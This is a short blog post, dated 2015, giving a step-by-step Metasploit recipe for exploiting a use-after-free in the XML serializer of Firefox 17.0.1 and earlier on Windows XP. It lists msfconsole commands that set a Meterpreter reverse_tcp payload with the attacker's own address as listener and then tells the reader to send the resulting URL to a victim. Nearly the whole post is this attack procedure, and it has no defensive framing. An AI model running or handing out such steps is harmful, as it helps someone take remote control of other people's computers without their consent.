Tuesday, 17 February 2015

How exploit Remote Windows PC using Firefox XML Serializer Use After Free

Exploit Remote Windows PC using Firefox XML Serializer Use After Free



This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.


Exploit Targets :
Firefox 17.0.1 or lower
Windows XP SP3

Requirements:

Attacker:kali or backtrack linux
Victim PC:Windows XP
steps:
1.Open terminal type msfconsole

2.Now type use exploit/windows/browser/ mozilla_firefox_xmlserializer

3.msf exploit (mozilla_firefox_xmlserializer)>set payload windows/meterpreter/reverse_tcp

4.msf exploit (mozilla_firefox_xmlserializer)>set lhost 192.168.1.136 (IP of Local Host)

 5.msf exploit (mozilla_firefox_xmlserializer)>set srvhost 192.168.1.136 (IP of Local Host)

 6.msf exploit (mozilla_firefox_xmlserializer)>set uripath  /

7.msf exploit (mozilla_firefox_xmlserializer)>exploit

 8.Now an URL you should give to your victim http:// 192.168.1.136:8080/

Posted by at No comments:
Subscribe to: Comments (Atom)